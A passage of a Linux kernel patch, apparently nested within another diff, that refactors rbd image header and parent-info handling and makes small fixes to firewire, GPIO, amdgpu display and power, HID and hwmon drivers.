+@@ -5742,14 +5713,17 @@ static int __get_parent_info_legacy(struct rbd_device *rbd_dev,
+ 	pii->has_overlap = true;
+ 	ceph_decode_64_safe(&p, end, pii->overlap, e_inval);
+ 
++	dout("%s pool_id %llu pool_ns %s image_id %s snap_id %llu has_overlap %d overlap %llu\n",
++	     __func__, pii->pool_id, pii->pool_ns, pii->image_id, pii->snap_id,
++	     pii->has_overlap, pii->overlap);
+ 	return 0;
+ 
+ e_inval:
+ 	return -EINVAL;
+ }
+ 
+-static int get_parent_info(struct rbd_device *rbd_dev,
+-			   struct parent_image_info *pii)
++static int rbd_dev_v2_parent_info(struct rbd_device *rbd_dev,
++				  struct parent_image_info *pii)
+ {
+ 	struct page *req_page, *reply_page;
+ 	void *p;
+@@ -5777,7 +5751,7 @@ static int get_parent_info(struct rbd_device *rbd_dev,
+ 	return ret;
+ }
+ 
+-static int rbd_dev_v2_parent_info(struct rbd_device *rbd_dev)
++static int rbd_dev_setup_parent(struct rbd_device *rbd_dev)
+ {
+ 	struct rbd_spec *parent_spec;
+ 	struct parent_image_info pii = { 0 };
+@@ -5787,37 +5761,12 @@ static int rbd_dev_v2_parent_info(struct rbd_device *rbd_dev)
+ 	if (!parent_spec)
+ 		return -ENOMEM;
+ 
+-	ret = get_parent_info(rbd_dev, &pii);
++	ret = rbd_dev_v2_parent_info(rbd_dev, &pii);
+ 	if (ret)
+ 		goto out_err;
+ 
+-	dout("%s pool_id %llu pool_ns %s image_id %s snap_id %llu has_overlap %d overlap %llu\n",
+-	     __func__, pii.pool_id, pii.pool_ns, pii.image_id, pii.snap_id,
+-	     pii.has_overlap, pii.overlap);
+-
+-	if (pii.pool_id == CEPH_NOPOOL || !pii.has_overlap) {
+-		/*
+-		 * Either the parent never existed, or we have
+-		 * record of it but the image got flattened so it no
+-		 * longer has a parent.  When the parent of a
+-		 * layered image disappears we immediately set the
+-		 * overlap to 0.  The effect of this is that all new
+-		 * requests will be treated as if the image had no
+-		 * parent.
+-		 *
+-		 * If !pii.has_overlap, the parent image spec is not
+-		 * applicable.  It's there to avoid duplication in each
+-		 * snapshot record.
+-		 */
+-		if (rbd_dev->parent_overlap) {
+-			rbd_dev->parent_overlap = 0;
+-			rbd_dev_parent_put(rbd_dev);
+-			pr_info("%s: clone image has been flattened\n",
+-				rbd_dev->disk->disk_name);
+-		}
+-
++	if (pii.pool_id == CEPH_NOPOOL || !pii.has_overlap)
+ 		goto out;	/* No parent?  No problem. */
+-	}
+ 
+ 	/* The ceph file layout needs to fit pool id in 32 bits */
+ 
+@@ -5829,58 +5778,46 @@ static int rbd_dev_v2_parent_info(struct rbd_device *rbd_dev)
+ 	}
+ 
+ 	/*
+-	 * The parent won't change (except when the clone is
+-	 * flattened, already handled that).  So we only need to
+-	 * record the parent spec we have not already done so.
++	 * The parent won't change except when the clone is flattened,
++	 * so we only need to record the parent image spec once.
+ 	 */
+-	if (!rbd_dev->parent_spec) {
+-		parent_spec->pool_id = pii.pool_id;
+-		if (pii.pool_ns && *pii.pool_ns) {
+-			parent_spec->pool_ns = pii.pool_ns;
+-			pii.pool_ns = NULL;
+-		}
+-		parent_spec->image_id = pii.image_id;
+-		pii.image_id = NULL;
+-		parent_spec->snap_id = pii.snap_id;
+-
+-		rbd_dev->parent_spec = parent_spec;
+-		parent_spec = NULL;	/* rbd_dev now owns this */
++	parent_spec->pool_id = pii.pool_id;
++	if (pii.pool_ns && *pii.pool_ns) {
++		parent_spec->pool_ns = pii.pool_ns;
++		pii.pool_ns = NULL;
+ 	}
++	parent_spec->image_id = pii.image_id;
++	pii.image_id = NULL;
++	parent_spec->snap_id = pii.snap_id;
++
++	rbd_assert(!rbd_dev->parent_spec);
++	rbd_dev->parent_spec = parent_spec;
++	parent_spec = NULL;	/* rbd_dev now owns this */
+ 
+ 	/*
+-	 * We always update the parent overlap.  If it's zero we issue
+-	 * a warning, as we will proceed as if there was no parent.
++	 * Record the parent overlap.  If it's zero, issue a warning as
++	 * we will proceed as if there is no parent.
+ 	 */
+-	if (!pii.overlap) {
+-		if (parent_spec) {
+-			/* refresh, careful to warn just once */
+-			if (rbd_dev->parent_overlap)
+-				rbd_warn(rbd_dev,
+-				    "clone now standalone (overlap became 0)");
+-		} else {
+-			/* initial probe */
+-			rbd_warn(rbd_dev, "clone is standalone (overlap 0)");
+-		}
+-	}
++	if (!pii.overlap)
++		rbd_warn(rbd_dev, "clone is standalone (overlap 0)");
+ 	rbd_dev->parent_overlap = pii.overlap;
+ 
+ out:
+ 	ret = 0;
+ out_err:
+-	kfree(pii.pool_ns);
+-	kfree(pii.image_id);
++	rbd_parent_info_cleanup(&pii);
+ 	rbd_spec_put(parent_spec);
+ 	return ret;
+ }
+ 
+-static int rbd_dev_v2_striping_info(struct rbd_device *rbd_dev)
++static int rbd_dev_v2_striping_info(struct rbd_device *rbd_dev,
++				    u64 *stripe_unit, u64 *stripe_count)
+ {
+ 	struct {
+ 		__le64 stripe_unit;
+ 		__le64 stripe_count;
+ 	} __attribute__ ((packed)) striping_info_buf = { 0 };
+ 	size_t size = sizeof (striping_info_buf);
+-	void *p;
+ 	int ret;
+ 
+ 	ret = rbd_obj_method_sync(rbd_dev, &rbd_dev->header_oid,
+@@ -5892,27 +5829,33 @@ static int rbd_dev_v2_striping_info(struct rbd_device *rbd_dev)
+ 	if (ret < size)
+ 		return -ERANGE;
+ 
+-	p = &striping_info_buf;
+-	rbd_dev->header.stripe_unit = ceph_decode_64(&p);
+-	rbd_dev->header.stripe_count = ceph_decode_64(&p);
++	*stripe_unit = le64_to_cpu(striping_info_buf.stripe_unit);
++	*stripe_count = le64_to_cpu(striping_info_buf.stripe_count);
++	dout("  stripe_unit = %llu stripe_count = %llu\n", *stripe_unit,
++	     *stripe_count);
++
+ 	return 0;
+ }
+ 
+-static int rbd_dev_v2_data_pool(struct rbd_device *rbd_dev)
++static int rbd_dev_v2_data_pool(struct rbd_device *rbd_dev, s64 *data_pool_id)
+ {
+-	__le64 data_pool_id;
++	__le64 data_pool_buf;
+ 	int ret;
+ 
+ 	ret = rbd_obj_method_sync(rbd_dev, &rbd_dev->header_oid,
+ 				  &rbd_dev->header_oloc, "get_data_pool",
+-				  NULL, 0, &data_pool_id, sizeof(data_pool_id));
++				  NULL, 0, &data_pool_buf,
++				  sizeof(data_pool_buf));
++	dout("%s: rbd_obj_method_sync returned %d\n", __func__, ret);
+ 	if (ret < 0)
+ 		return ret;
+-	if (ret < sizeof(data_pool_id))
++	if (ret < sizeof(data_pool_buf))
+ 		return -EBADMSG;
+ 
+-	rbd_dev->header.data_pool_id = le64_to_cpu(data_pool_id);
+-	WARN_ON(rbd_dev->header.data_pool_id == CEPH_NOPOOL);
++	*data_pool_id = le64_to_cpu(data_pool_buf);
++	dout("  data_pool_id = %lld\n", *data_pool_id);
++	WARN_ON(*data_pool_id == CEPH_NOPOOL);
++
+ 	return 0;
+ }
+ 
+@@ -6104,7 +6047,8 @@ out_err:
+ 	return ret;
+ }
+ 
+-static int rbd_dev_v2_snap_context(struct rbd_device *rbd_dev)
++static int rbd_dev_v2_snap_context(struct rbd_device *rbd_dev,
++				   struct ceph_snap_context **psnapc)
+ {
+ 	size_t size;
+ 	int ret;
+@@ -6165,9 +6109,7 @@ static int rbd_dev_v2_snap_context(struct rbd_device *rbd_dev)
+ 	for (i = 0; i < snap_count; i++)
+ 		snapc->snaps[i] = ceph_decode_64(&p);
+ 
+-	ceph_put_snap_context(rbd_dev->header.snapc);
+-	rbd_dev->header.snapc = snapc;
+-
++	*psnapc = snapc;
+ 	dout("  snap context seq = %llu, snap_count = %u\n",
+ 		(unsigned long long)seq, (unsigned int)snap_count);
+ out:
+@@ -6216,38 +6158,42 @@ out:
+ 	return snap_name;
+ }
+ 
+-static int rbd_dev_v2_header_info(struct rbd_device *rbd_dev)
++static int rbd_dev_v2_header_info(struct rbd_device *rbd_dev,
++				  struct rbd_image_header *header,
++				  bool first_time)
+ {
+-	bool first_time = rbd_dev->header.object_prefix == NULL;
+ 	int ret;
+ 
+-	ret = rbd_dev_v2_image_size(rbd_dev);
++	ret = _rbd_dev_v2_snap_size(rbd_dev, CEPH_NOSNAP,
++				    first_time ? &header->obj_order : NULL,
++				    &header->image_size);
+ 	if (ret)
+ 		return ret;
+ 
+ 	if (first_time) {
+-		ret = rbd_dev_v2_header_onetime(rbd_dev);
++		ret = rbd_dev_v2_header_onetime(rbd_dev, header);
+ 		if (ret)
+ 			return ret;
+ 	}
+ 
+-	ret = rbd_dev_v2_snap_context(rbd_dev);
+-	if (ret && first_time) {
+-		kfree(rbd_dev->header.object_prefix);
+-		rbd_dev->header.object_prefix = NULL;
+-	}
++	ret = rbd_dev_v2_snap_context(rbd_dev, &header->snapc);
++	if (ret)
++		return ret;
+ 
+-	return ret;
++	return 0;
+ }
+ 
+-static int rbd_dev_header_info(struct rbd_device *rbd_dev)
++static int rbd_dev_header_info(struct rbd_device *rbd_dev,
++			       struct rbd_image_header *header,
++			       bool first_time)
+ {
+ 	rbd_assert(rbd_image_format_valid(rbd_dev->image_format));
++	rbd_assert(!header->object_prefix && !header->snapc);
+ 
+ 	if (rbd_dev->image_format == 1)
+-		return rbd_dev_v1_header_info(rbd_dev);
++		return rbd_dev_v1_header_info(rbd_dev, header, first_time);
+ 
+-	return rbd_dev_v2_header_info(rbd_dev);
++	return rbd_dev_v2_header_info(rbd_dev, header, first_time);
+ }
+ 
+ /*
+@@ -6735,60 +6681,49 @@ out:
+  */
+ static void rbd_dev_unprobe(struct rbd_device *rbd_dev)
+ {
+-	struct rbd_image_header	*header;
+-
+ 	rbd_dev_parent_put(rbd_dev);
+ 	rbd_object_map_free(rbd_dev);
+ 	rbd_dev_mapping_clear(rbd_dev);
+ 
+ 	/* Free dynamic fields from the header, then zero it out */
+ 
+-	header = &rbd_dev->header;
+-	ceph_put_snap_context(header->snapc);
+-	kfree(header->snap_sizes);
+-	kfree(header->snap_names);
+-	kfree(header->object_prefix);
+-	memset(header, 0, sizeof (*header));
++	rbd_image_header_cleanup(&rbd_dev->header);
+ }
+ 
+-static int rbd_dev_v2_header_onetime(struct rbd_device *rbd_dev)
++static int rbd_dev_v2_header_onetime(struct rbd_device *rbd_dev,
++				     struct rbd_image_header *header)
+ {
+ 	int ret;
+ 
+-	ret = rbd_dev_v2_object_prefix(rbd_dev);
++	ret = rbd_dev_v2_object_prefix(rbd_dev, &header->object_prefix);
+ 	if (ret)
+-		goto out_err;
++		return ret;
+ 
+ 	/*
+ 	 * Get the and check features for the image.  Currently the
+ 	 * features are assumed to never change.
+ 	 */
+-	ret = rbd_dev_v2_features(rbd_dev);
++	ret = _rbd_dev_v2_snap_features(rbd_dev, CEPH_NOSNAP,
++					rbd_is_ro(rbd_dev), &header->features);
+ 	if (ret)
+-		goto out_err;
++		return ret;
+ 
+ 	/* If the image supports fancy striping, get its parameters */
+ 
+-	if (rbd_dev->header.features & RBD_FEATURE_STRIPINGV2) {
+-		ret = rbd_dev_v2_striping_info(rbd_dev);
+-		if (ret < 0)
+-			goto out_err;
++	if (header->features & RBD_FEATURE_STRIPINGV2) {
++		ret = rbd_dev_v2_striping_info(rbd_dev, &header->stripe_unit,
++					       &header->stripe_count);
++		if (ret)
++			return ret;
+ 	}
+ 
+-	if (rbd_dev->header.features & RBD_FEATURE_DATA_POOL) {
+-		ret = rbd_dev_v2_data_pool(rbd_dev);
++	if (header->features & RBD_FEATURE_DATA_POOL) {
++		ret = rbd_dev_v2_data_pool(rbd_dev, &header->data_pool_id);
+ 		if (ret)
+-			goto out_err;
++			return ret;
+ 	}
+ 
+-	rbd_init_layout(rbd_dev);
+ 	return 0;
+-
+-out_err:
+-	rbd_dev->header.features = 0;
+-	kfree(rbd_dev->header.object_prefix);
+-	rbd_dev->header.object_prefix = NULL;
+-	return ret;
+ }
+ 
+ /*
+@@ -6983,13 +6918,15 @@ static int rbd_dev_image_probe(struct rbd_device *rbd_dev, int depth)
+ 	if (!depth)
+ 		down_write(&rbd_dev->header_rwsem);
+ 
+-	ret = rbd_dev_header_info(rbd_dev);
++	ret = rbd_dev_header_info(rbd_dev, &rbd_dev->header, true);
+ 	if (ret) {
+ 		if (ret == -ENOENT && !need_watch)
+ 			rbd_print_dne(rbd_dev, false);
+ 		goto err_out_probe;
+ 	}
+ 
++	rbd_init_layout(rbd_dev);
++
+ 	/*
+ 	 * If this image is the one being mapped, we have pool name and
+ 	 * id, image name and id, and snap name - need to fill snap id.
+@@ -7018,7 +6955,7 @@ static int rbd_dev_image_probe(struct rbd_device *rbd_dev, int depth)
+ 	}
+ 
+ 	if (rbd_dev->header.features & RBD_FEATURE_LAYERING) {
+-		ret = rbd_dev_v2_parent_info(rbd_dev);
++		ret = rbd_dev_setup_parent(rbd_dev);
+ 		if (ret)
+ 			goto err_out_probe;
+ 	}
+@@ -7044,6 +6981,107 @@ err_out_format:
+ 	return ret;
+ }
+ 
++static void rbd_dev_update_header(struct rbd_device *rbd_dev,
++				  struct rbd_image_header *header)
++{
++	rbd_assert(rbd_image_format_valid(rbd_dev->image_format));
++	rbd_assert(rbd_dev->header.object_prefix); /* !first_time */
++
++	if (rbd_dev->header.image_size != header->image_size) {
++		rbd_dev->header.image_size = header->image_size;
++
++		if (!rbd_is_snap(rbd_dev)) {
++			rbd_dev->mapping.size = header->image_size;
++			rbd_dev_update_size(rbd_dev);
++		}
++	}
++
++	ceph_put_snap_context(rbd_dev->header.snapc);
++	rbd_dev->header.snapc = header->snapc;
++	header->snapc = NULL;
++
++	if (rbd_dev->image_format == 1) {
++		kfree(rbd_dev->header.snap_names);
++		rbd_dev->header.snap_names = header->snap_names;
++		header->snap_names = NULL;
++
++		kfree(rbd_dev->header.snap_sizes);
++		rbd_dev->header.snap_sizes = header->snap_sizes;
++		header->snap_sizes = NULL;
++	}
++}
++
++static void rbd_dev_update_parent(struct rbd_device *rbd_dev,
++				  struct parent_image_info *pii)
++{
++	if (pii->pool_id == CEPH_NOPOOL || !pii->has_overlap) {
++		/*
++		 * Either the parent never existed, or we have
++		 * record of it but the image got flattened so it no
++		 * longer has a parent.  When the parent of a
++		 * layered image disappears we immediately set the
++		 * overlap to 0.  The effect of this is that all new
++		 * requests will be treated as if the image had no
++		 * parent.
++		 *
++		 * If !pii.has_overlap, the parent image spec is not
++		 * applicable.  It's there to avoid duplication in each
++		 * snapshot record.
++		 */
++		if (rbd_dev->parent_overlap) {
++			rbd_dev->parent_overlap = 0;
++			rbd_dev_parent_put(rbd_dev);
++			pr_info("%s: clone has been flattened\n",
++				rbd_dev->disk->disk_name);
++		}
++	} else {
++		rbd_assert(rbd_dev->parent_spec);
++
++		/*
++		 * Update the parent overlap.  If it became zero, issue
++		 * a warning as we will proceed as if there is no parent.
++		 */
++		if (!pii->overlap && rbd_dev->parent_overlap)
++			rbd_warn(rbd_dev,
++				 "clone has become standalone (overlap 0)");
++		rbd_dev->parent_overlap = pii->overlap;
++	}
++}
++
++static int rbd_dev_refresh(struct rbd_device *rbd_dev)
++{
++	struct rbd_image_header	header = { 0 };
++	struct parent_image_info pii = { 0 };
++	int ret;
++
++	dout("%s rbd_dev %p\n", __func__, rbd_dev);
++
++	ret = rbd_dev_header_info(rbd_dev, &header, false);
++	if (ret)
++		goto out;
++
++	/*
++	 * If there is a parent, see if it has disappeared due to the
++	 * mapped image getting flattened.
++	 */
++	if (rbd_dev->parent) {
++		ret = rbd_dev_v2_parent_info(rbd_dev, &pii);
++		if (ret)
++			goto out;
++	}
++
++	down_write(&rbd_dev->header_rwsem);
++	rbd_dev_update_header(rbd_dev, &header);
++	if (rbd_dev->parent)
++		rbd_dev_update_parent(rbd_dev, &pii);
++	up_write(&rbd_dev->header_rwsem);
++
++out:
++	rbd_parent_info_cleanup(&pii);
++	rbd_image_header_cleanup(&header);
++	return ret;
++}
++
+ static ssize_t do_rbd_add(struct bus_type *bus,
+ 			  const char *buf,
+ 			  size_t count)
+diff --git a/drivers/firewire/sbp2.c b/drivers/firewire/sbp2.c
+index 60051c0cabeaa..e322a326546b5 100644
+--- a/drivers/firewire/sbp2.c
++++ b/drivers/firewire/sbp2.c
+@@ -81,7 +81,8 @@ MODULE_PARM_DESC(exclusive_login, "Exclusive login to sbp2 device "
+  *
+  * - power condition
+  *   Set the power condition field in the START STOP UNIT commands sent by
+- *   sd_mod on suspend, resume, and shutdown (if manage_start_stop is on).
++ *   sd_mod on suspend, resume, and shutdown (if manage_system_start_stop or
++ *   manage_runtime_start_stop is on).
+  *   Some disks need this to spin down or to resume properly.
+  *
+  * - override internal blacklist
+@@ -1517,8 +1518,10 @@ static int sbp2_scsi_slave_configure(struct scsi_device *sdev)
+ 
+ 	sdev->use_10_for_rw = 1;
+ 
+-	if (sbp2_param_exclusive_login)
+-		sdev->manage_start_stop = 1;
++	if (sbp2_param_exclusive_login) {
++		sdev->manage_system_start_stop = true;
++		sdev->manage_runtime_start_stop = true;
++	}
+ 
+ 	if (sdev->type == TYPE_ROM)
+ 		sdev->use_10_for_ms = 1;
+diff --git a/drivers/gpio/gpio-aspeed.c b/drivers/gpio/gpio-aspeed.c
+index 318a7d95a1a8b..42d3e1cf73528 100644
+--- a/drivers/gpio/gpio-aspeed.c
++++ b/drivers/gpio/gpio-aspeed.c
+@@ -963,7 +963,7 @@ static int aspeed_gpio_set_config(struct gpio_chip *chip, unsigned int offset,
+ 	else if (param == PIN_CONFIG_BIAS_DISABLE ||
+ 			param == PIN_CONFIG_BIAS_PULL_DOWN ||
+ 			param == PIN_CONFIG_DRIVE_STRENGTH)
+-		return pinctrl_gpio_set_config(offset, config);
++		return pinctrl_gpio_set_config(chip->base + offset, config);
+ 	else if (param == PIN_CONFIG_DRIVE_OPEN_DRAIN ||
+ 			param == PIN_CONFIG_DRIVE_OPEN_SOURCE)
+ 		/* Return -ENOTSUPP to trigger emulation, as per datasheet */
+diff --git a/drivers/gpio/gpio-pxa.c b/drivers/gpio/gpio-pxa.c
+index 1198ab0305d03..b90357774dc04 100644
+--- a/drivers/gpio/gpio-pxa.c
++++ b/drivers/gpio/gpio-pxa.c
+@@ -243,6 +243,7 @@ static bool pxa_gpio_has_pinctrl(void)
+ 	switch (gpio_type) {
+ 	case PXA3XX_GPIO:
+ 	case MMP2_GPIO:
++	case MMP_GPIO:
+ 		return false;
+ 
+ 	default:
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 5f5999cea7d2c..92fa2faf63e41 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -2179,7 +2179,7 @@ static int amdgpu_device_ip_early_init(struct amdgpu_device *adev)
+ 		adev->flags |= AMD_IS_PX;
+ 
+ 	if (!(adev->flags & AMD_IS_APU)) {
+-		parent = pci_upstream_bridge(adev->pdev);
++		parent = pcie_find_root_port(adev->pdev);
+ 		adev->has_pr3 = parent ? pci_pr3_present(parent) : false;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 18274ff5082ad..339f1f5a08339 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -2344,14 +2344,62 @@ static int dm_late_init(void *handle)
+ 	return detect_mst_link_for_all_connectors(adev_to_drm(adev));
+ }
+ 
++static void resume_mst_branch_status(struct drm_dp_mst_topology_mgr *mgr)
++{
++	int ret;
++	u8 guid[16];
++	u64 tmp64;
++
++	mutex_lock(&mgr->lock);
++	if (!mgr->mst_primary)
++		goto out_fail;
++
++	if (drm_dp_read_dpcd_caps(mgr->aux, mgr->dpcd) < 0) {
++		drm_dbg_kms(mgr->dev, "dpcd read failed - undocked during suspend?\n");
++		goto out_fail;
++	}
++
++	ret = drm_dp_dpcd_writeb(mgr->aux, DP_MSTM_CTRL,
++				 DP_MST_EN |
++				 DP_UP_REQ_EN |
++				 DP_UPSTREAM_IS_SRC);
++	if (ret < 0) {
++		drm_dbg_kms(mgr->dev, "mst write failed - undocked during suspend?\n");
++		goto out_fail;
++	}
++
++	/* Some hubs forget their guids after they resume */
++	ret = drm_dp_dpcd_read(mgr->aux, DP_GUID, guid, 16);
++	if (ret != 16) {
++		drm_dbg_kms(mgr->dev, "dpcd read failed - undocked during suspend?\n");
++		goto out_fail;
++	}
++
++	if (memchr_inv(guid, 0, 16) == NULL) {
++		tmp64 = get_jiffies_64();
++		memcpy(&guid[0], &tmp64, sizeof(u64));
++		memcpy(&guid[8], &tmp64, sizeof(u64));
++
++		ret = drm_dp_dpcd_write(mgr->aux, DP_GUID, guid, 16);
++
++		if (ret != 16) {
++			drm_dbg_kms(mgr->dev, "check mstb guid failed - undocked during suspend?\n");
++			goto out_fail;
++		}
++	}
++
++	memcpy(mgr->mst_primary->guid, guid, 16);
++
++out_fail:
++	mutex_unlock(&mgr->lock);
++}
++
+ static void s3_handle_mst(struct drm_device *dev, bool suspend)
+ {
+ 	struct amdgpu_dm_connector *aconnector;
+ 	struct drm_connector *connector;
+ 	struct drm_connector_list_iter iter;
+ 	struct drm_dp_mst_topology_mgr *mgr;
+-	int ret;
+-	bool need_hotplug = false;
+ 
+ 	drm_connector_list_iter_begin(dev, &iter);
+ 	drm_for_each_connector_iter(connector, &iter) {
+@@ -2373,18 +2421,15 @@ static void s3_handle_mst(struct drm_device *dev, bool suspend)
+ 			if (!dp_is_lttpr_present(aconnector->dc_link))
+ 				dc_link_aux_try_to_configure_timeout(aconnector->dc_link->ddc, LINK_AUX_DEFAULT_TIMEOUT_PERIOD);
+ 
+-			ret = drm_dp_mst_topology_mgr_resume(mgr, true);
+-			if (ret < 0) {
+-				dm_helpers_dp_mst_stop_top_mgr(aconnector->dc_link->ctx,
+-					aconnector->dc_link);
+-				need_hotplug = true;
+-			}
++			/* TODO: move resume_mst_branch_status() into drm mst resume again
++			 * once topology probing work is pulled out from mst resume into mst
++			 * resume 2nd step. mst resume 2nd step should be called after old
++			 * state getting restored (i.e. drm_atomic_helper_resume()).
++			 */
++			resume_mst_branch_status(mgr);
+ 		}
+ 	}
+ 	drm_connector_list_iter_end(&iter);
+-
+-	if (need_hotplug)
+-		drm_kms_helper_hotplug_event(dev);
+ }
+ 
+ static int amdgpu_dm_smu_write_watermarks_table(struct amdgpu_device *adev)
+@@ -2773,7 +2818,8 @@ static int dm_resume(void *handle)
+ 	struct dm_atomic_state *dm_state = to_dm_atomic_state(dm->atomic_obj.state);
+ 	enum dc_connection_type new_connection_type = dc_connection_none;
+ 	struct dc_state *dc_state;
+-	int i, r, j;
++	int i, r, j, ret;
++	bool need_hotplug = false;
+ 
+ 	if (amdgpu_in_reset(adev)) {
+ 		dc_state = dm->cached_dc_state;
+@@ -2871,7 +2917,7 @@ static int dm_resume(void *handle)
+ 			continue;
+ 
+ 		/*
+-		 * this is the case when traversing through already created
++		 * this is the case when traversing through already created end sink
+ 		 * MST connectors, should be skipped
+ 		 */
+ 		if (aconnector && aconnector->mst_port)
+@@ -2931,6 +2977,27 @@ static int dm_resume(void *handle)
+ 
+ 	dm->cached_state = NULL;
+ 
++	/* Do mst topology probing after resuming cached state*/
++	drm_connector_list_iter_begin(ddev, &iter);
++	drm_for_each_connector_iter(connector, &iter) {
++		aconnector = to_amdgpu_dm_connector(connector);
++		if (aconnector->dc_link->type != dc_connection_mst_branch ||
++		    aconnector->mst_port)
++			continue;
++
++		ret = drm_dp_mst_topology_mgr_resume(&aconnector->mst_mgr, true);
++
++		if (ret < 0) {
++			dm_helpers_dp_mst_stop_top_mgr(aconnector->dc_link->ctx,
++					aconnector->dc_link);
++			need_hotplug = true;
++		}
++	}
++	drm_connector_list_iter_end(&iter);
++
++	if (need_hotplug)
++		drm_kms_helper_hotplug_event(ddev);
++
+ 	amdgpu_dm_irq_resume_late(adev);
+ 
+ 	amdgpu_dm_smu_write_watermarks_table(adev);
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+index 839a812e0da32..fbc4d706748b7 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+@@ -2081,36 +2081,41 @@ static int sienna_cichlid_display_disable_memory_clock_switch(struct smu_context
+ 	return ret;
+ }
+ 
++#define MAX(a, b)	((a) > (b) ? (a) : (b))
++
+ static int sienna_cichlid_update_pcie_parameters(struct smu_context *smu,
+ 					 uint32_t pcie_gen_cap,
+ 					 uint32_t pcie_width_cap)
+ {
+ 	struct smu_11_0_dpm_context *dpm_context = smu->smu_dpm.dpm_context;
+ 	struct smu_11_0_pcie_table *pcie_table = &dpm_context->dpm_tables.pcie_table;
+-	u32 smu_pcie_arg;
++	uint8_t *table_member1, *table_member2;
++	uint32_t min_gen_speed, max_gen_speed;
++	uint32_t min_lane_width, max_lane_width;
++	uint32_t smu_pcie_arg;
+ 	int ret, i;
+ 
+-	/* PCIE gen speed and lane width override */
+-	if (!amdgpu_device_pcie_dynamic_switching_supported()) {
+-		if (pcie_table->pcie_gen[NUM_LINK_LEVELS - 1] < pcie_gen_cap)
+-			pcie_gen_cap = pcie_table->pcie_gen[NUM_LINK_LEVELS - 1];
++	GET_PPTABLE_MEMBER(PcieGenSpeed, &table_member1);
++	GET_PPTABLE_MEMBER(PcieLaneCount, &table_member2);
+ 
+-		if (pcie_table->pcie_lane[NUM_LINK_LEVELS - 1] < pcie_width_cap)
+-			pcie_width_cap = pcie_table->pcie_lane[NUM_LINK_LEVELS - 1];
++	min_gen_speed = MAX(0, table_member1[0]);
++	max_gen_speed = MIN(pcie_gen_cap, table_member1[1]);
++	min_gen_speed = min_gen_speed > max_gen_speed ?
++			max_gen_speed : min_gen_speed;
++	min_lane_width = MAX(1, table_member2[0]);
++	max_lane_width = MIN(pcie_width_cap, table_member2[1]);
++	min_lane_width = min_lane_width > max_lane_width ?
++			 max_lane_width : min_lane_width;
+ 
+-		/* Force all levels to use the same settings */
+-		for (i = 0; i < NUM_LINK_LEVELS; i++) {
+-			pcie_table->pcie_gen[i] = pcie_gen_cap;
+-			pcie_table->pcie_lane[i] = pcie_width_cap;
+-		}
++	if (!amdgpu_device_pcie_dynamic_switching_supported()) {
++		pcie_table->pcie_gen[0] = max_gen_speed;
++		pcie_table->pcie_lane[0] = max_lane_width;
+ 	} else {
+-		for (i = 0; i < NUM_LINK_LEVELS; i++) {
+-			if (pcie_table->pcie_gen[i] > pcie_gen_cap)
+-				pcie_table->pcie_gen[i] = pcie_gen_cap;
+-			if (pcie_table->pcie_lane[i] > pcie_width_cap)
+-				pcie_table->pcie_lane[i] = pcie_width_cap;
+-		}
++		pcie_table->pcie_gen[0] = min_gen_speed;
++		pcie_table->pcie_lane[0] = min_lane_width;
+ 	}
++	pcie_table->pcie_gen[1] = max_gen_speed;
++	pcie_table->pcie_lane[1] = max_lane_width;
+ 
+ 	for (i = 0; i < NUM_LINK_LEVELS; i++) {
+ 		smu_pcie_arg = (i << 16 |
+diff --git a/drivers/hid/hid-sony.c b/drivers/hid/hid-sony.c
+index 03691cdcfb8e1..f7f7252d839ee 100644
+--- a/drivers/hid/hid-sony.c
++++ b/drivers/hid/hid-sony.c
+@@ -3074,6 +3074,8 @@ static int sony_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	return ret;
+ 
+ err:
++	usb_free_urb(sc->ghl_urb);
++
+ 	hid_hw_stop(hdev);
+ 	return ret;
+ }
+diff --git a/drivers/hid/intel-ish-hid/ipc/pci-ish.c b/drivers/hid/intel-ish-hid/ipc/pci-ish.c
+index 55cb25038e632..710fda5f19e1c 100644
+--- a/drivers/hid/intel-ish-hid/ipc/pci-ish.c
++++ b/drivers/hid/intel-ish-hid/ipc/pci-ish.c
+@@ -133,6 +133,14 @@ static int enable_gpe(struct device *dev)
+ 	}
+ 	wakeup = &adev->wakeup;
+ 
++	/*
++	 * Call acpi_disable_gpe(), so that reference count
++	 * gpe_event_info->runtime_count doesn't overflow.
++	 * When gpe_event_info->runtime_count = 0, the call
++	 * to acpi_disable_gpe() simply return.
++	 */
++	acpi_disable_gpe(wakeup->gpe_device, wakeup->gpe_number);
++
+ 	acpi_sts = acpi_enable_gpe(wakeup->gpe_device, wakeup->gpe_number);
+ 	if (ACPI_FAILURE(acpi_sts)) {
+ 		dev_err(dev, "enable ose_gpe failed\n");
+diff --git a/drivers/hwmon/nzxt-smart2.c b/drivers/hwmon/nzxt-smart2.c
+index 533f38b0b4e9b..a8e72d8fd0605 100644
+--- a/drivers/hwmon/nzxt-smart2.c
++++ b/drivers/hwmon/nzxt-smart2.c
+@@ -791,6 +791,8 @@ static const struct hid_device_id nzxt_smart2_hid_id_table[] = {
+ 	{ HID_USB_DEVICE(0x1e71, 0x2009) }, /* NZXT RGB & Fan Controller */
+ 	{ HID_USB_DEVICE(0x1e71, 0x200e) }, /* NZXT RGB & Fan Controller */
+ 	{ HID_USB_DEVICE(0x1e71, 0x2010) }, /* NZXT RGB & Fan Controller */
++	{ HID_USB_DEVICE(0x1e71, 0x2011) }, /* NZXT RGB & Fan Controller (6 RGB) */
++	{ HID_USB_DEVICE(0x1e71, 0x2019) }, /* NZXT RGB & Fan Controller (6 RGB) */
+ 	{},
+ };
+ 
+diff --git a/drivers/idle/intel_idle.c b/drivers/idle/intel_idle.c
+index cfeb24d40d378..bb3d10099ba44 100644
